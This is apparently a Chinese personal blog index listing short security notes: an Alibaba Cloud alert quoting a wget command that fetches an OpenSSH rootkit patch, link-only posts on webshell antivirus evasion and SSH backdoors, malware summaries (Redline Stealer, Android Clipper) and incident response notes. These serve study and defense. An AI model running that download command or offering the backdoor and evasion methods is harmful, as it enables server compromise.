katago - 博客园

2022年6月15日

阿里云监测恶意脚本

摘要：命令行: wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz 阅读全文

posted @ 2022-06-15 17:39 katago 阅读(327) 评论(0) 推荐(0)

curl 查看本机公网IP

摘要： curl ipinfo.io 阅读全文

posted @ 2022-06-15 16:59 katago 阅读(318) 评论(0) 推荐(0)

2022年6月10日

Nginx的配置文件

摘要： Nginx的核心配置文件/usr/local/nginx/conf/nginx.conf 参考： https://blog.csdn.net/smilehappiness/article/details/106675860 ... #全局块 events { #events块 ... } http 阅读全文

posted @ 2022-06-10 17:59 katago 阅读(115) 评论(0) 推荐(0)

Chrome 浏览器追踪链接跳转过程

摘要： chrome web store 安装插件 link redirect trace 可以看到跳转的整个过程，用于分析offer 阅读全文

posted @ 2022-06-10 16:29 katago 阅读(93) 评论(0) 推荐(0)

2022年6月8日

webshell 免杀

摘要： https://xz.aliyun.com/t/11391 阅读全文

posted @ 2022-06-08 17:53 katago 阅读(24) 评论(0) 推荐(0)

ssh backdoor

摘要： http://www.broadview.com.cn/article/124 https://www.freebuf.com/articles/network/255302.html https://javamana.com/2021/12/202112270415304965.html ssh 阅读全文

posted @ 2022-06-08 11:19 katago 阅读(28) 评论(0) 推荐(0)

2022年6月6日

Redline Stealer

摘要： Redline Stealer 执行流程 Entity2：存储配置数据的结构。 Entity7：存储收集结果的结构。（环境细节+实体1）Entity1：存储凭证详细信息的结构。环境详细信息，包括受感染的 PC 信息凭证详细信息，包括加密钱包、帐户和用户数据信息阅读全文

posted @ 2022-06-06 15:56 katago 阅读(132) 评论(0) 推荐(0)

安卓剪切板木马 Clipper 浮出水面，花样窃取你的数字资产

摘要：一旦恶意应用被打开，它就会显示一个虚假的错误信息并退出，然后在后台默默地运行。恶意应用将其图标隐藏在Android主屏幕上的应用程序列表中，如果不仔细查看就很难发现。随后，在每次打开受感染的智能手机或平板电脑时，Clipper木马就会随之自行启动。Clipper木马会随时监视剪贴板内容的变化。一旦用户将电子钱包地址复制到剪贴板，它就会将地址发送到由网络犯罪分子控制的命令和控制服务器。然后，从服务器阅读全文

posted @ 2022-06-06 11:09 katago 阅读(603) 评论(0) 推荐(0)

C2

摘要：概念 C&C （Command and Control server，命令和控制服务器），也可写作C2，是一种用于向受恶意软件（自动程序（bot）、木马（rootkit）、蠕虫（worm））感染的计算机的服务器的恶意软件发送指令或更新程序的服务器，即C&C服务器用于控制这些恶意软件。通常，C&C 服阅读全文

posted @ 2022-06-06 10:41 katago 阅读(1008) 评论(0) 推荐(0)

2022年6月1日

应急响应实战笔记

摘要： https://bypass007.github.io/Emergency-Response-Notes/ openssl后门可以试试看 https://bypass007.github.io/Emergency-Response-Notes/privilege/%E7%AC%AC4%E7%AF%8 阅读全文

posted @ 2022-06-01 18:05 katago 阅读(64) 评论(0) 推荐(0)

Just run

公告